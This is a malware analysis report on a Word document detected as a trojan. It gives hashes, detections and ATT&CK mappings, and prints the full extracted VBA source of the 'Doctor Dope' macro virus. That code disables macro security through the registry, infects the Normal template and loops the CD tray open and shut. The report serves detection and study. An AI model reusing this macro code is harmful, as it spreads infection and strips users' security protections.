Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5310680e4f6b8f22…

MALICIOUS

Office (OLE)

31.0 KB Created: 2002-03-26 21:04:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: be5fc5660d9d622ad75c8984b508e4a8 SHA-1: 6097ac50871fd35a2ca4ee10d3a1608497973b30 SHA-256: 5310680e4f6b8f2293070b6e37b408d4d6fcb79fe62ccf150c91b2a35320191b
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a critical indicator of malicious intent. The script attempts to lower macro security settings and inject code into the document and Normal.dot template, suggesting an attempt at persistence. The ClamAV detections 'Win.Trojan.Kallisti-1' and 'Doc.Trojan.Assilem-1' further confirm its malicious nature, likely indicating a trojan downloader or dropper.

Heuristics 3

  • ClamAV: Win.Trojan.Kallisti-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Kallisti-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3205 bytes
SHA-256: 3c063f7fdbef1819bd8c97812cdfe7bacc29e9ca6806c5a253e99ff243ed7011
Detection
ClamAV: Doc.Trojan.Assilem-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
WMXP.DrDope
Attribute VB_Name = "DrDope"

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Sub Document_Open()
On Error Resume Next
'VirusName: Doctor Dope
'coded by Necronomikon
'Info: Written for a friend of mine!We all call him Doctor Dope(Steve)!?;)
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
'--- cut here ---
'this code is taken from XP.Kallisti by jackie/lz0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
'--- cut here ---
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NT1 = NT.CodeModule.CountOfLines
AD1 = AD.CodeModule.CountOfLines
Nec = 2
If AD.Name <> "ddope" Then
If AD1 > 0 Then _
AD.CodeModule.DeleteLines 1, AD1
Set ToInfect = AD
AD.Name = "ddope"
DoAD = True
End If
If NT.Name <> "ddope" Then
If NT1 > 0 Then _
NT.CodeModule.DeleteLines 1, NT1
Set ToInfect = NT
NT.Name = "ddope"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo bye
If DoNT = True Then
Do While AD.CodeModule.Lines(1, 1) = ""
AD.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While AD.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, AD.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loop
End If
End If
If DoAD = True Then
Do While NT.CodeModule.Lines(1, 1) = ""
NT.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NT.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, NT.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loop
End If
bye:
If NT1 <> 0 And AD1 = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
Call Payload
End Sub
Private Sub Payload()
On Error Resume Next
'Thanks WalruS for code!;)
Do
mciSendString "set cd door open", 0, 0, 0: mciSendString "set cd door closed", 0, 0, 0: mciSendString "set cd time format tmsf wait", 0, 0, 0: mciSendString "open cdaudio alias cd wait shareable", 0, 0, 0
Loop
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.